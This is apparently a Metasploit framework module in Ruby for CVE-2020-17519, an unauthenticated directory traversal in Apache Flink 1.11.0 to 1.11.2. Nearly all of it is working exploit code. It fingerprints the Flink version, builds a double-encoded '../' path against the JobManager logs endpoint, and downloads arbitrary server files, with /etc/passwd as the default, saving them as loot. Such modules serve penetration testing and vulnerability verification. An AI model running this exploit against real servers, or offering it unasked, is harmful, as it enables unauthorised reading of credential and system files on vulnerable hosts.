modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink JobManager Traversal',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in Apache Flink versions 1.11.0 <= 1.11.2. The JobManager REST API fails
to validate user-supplied log file paths, allowing retrieval of arbitrary
files with the privileges of the web server user.
This module has been tested successfully on Apache Flink version 1.11.2
on Ubuntu 18.04.4.
},
'Author' => [
'0rich1 - Ant Security FG Lab', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'bcoles', # Metasploit module cleanup and improvements
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-17519'],
['CWE', '22'],
['EDB', '49398'],
['PACKETSTORM', '160849'],
['URL', 'https://www.openwall.com/lists/oss-security/2021/01/05/2'],
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
],
'DefaultOptions' => { 'RPORT' => 8081 },
'DisclosureDate' => '2021-01-05',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptInt.new('DEPTH', [ true, 'Depth for path traversal', 10]),
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
])
end
def check_host(_ip)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'config')
})
unless res
return Exploit::CheckCode::Unknown('No reply.')
end
unless res.body.include?('flink')
return Exploit::CheckCode::Safe('Target is not Apache Flink.')
end
version = res.get_json_document['flink-version']
if version.blank?
return Exploit::CheckCode::Detected('Could not determine Apache Flink software version.')
end
if Rex::Version.new(version).between?(Rex::Version.new('1.11.0'), Rex::Version.new('1.11.2'))
return Exploit::CheckCode::Appears("Apache Flink version #{version} appears vulnerable.")
end
Exploit::CheckCode::Safe("Apache Flink version #{version} is not vulnerable.")
end
def retrieve_file(depth, filepath)
traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{'../' * depth}#{filepath}", 'hex-all'))
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', traversal)
})
unless res
print_error('No reply')
return
end
if res.code == 404
print_error('File not found')
return
end
if res.code == 500
print_error("Unexpected reply (HTTP #{res.code}): Server encountered an error attempting to read file")
msg = res.body.scan(/Caused by: (.+?)\\n/).flatten.last
print_error(msg) if msg
return
end
if res.code != 200
print_error("Unexpected reply (HTTP #{res.code})")
return
end
res.body.to_s
end
def run_host(ip)
depth = datastore['DEPTH']
filepath = datastore['FILEPATH']
print_status("Downloading #{filepath} ...")
res = retrieve_file(depth, filepath)
return if res.blank?
print_good("Downloaded #{filepath} (#{res.length} bytes)")
path = store_loot(
'apache.flink.jobmanager.traversal',
'text/plain',
ip,
res,
File.basename(filepath)
)
print_good("File #{filepath} saved in: #{path}")
end
end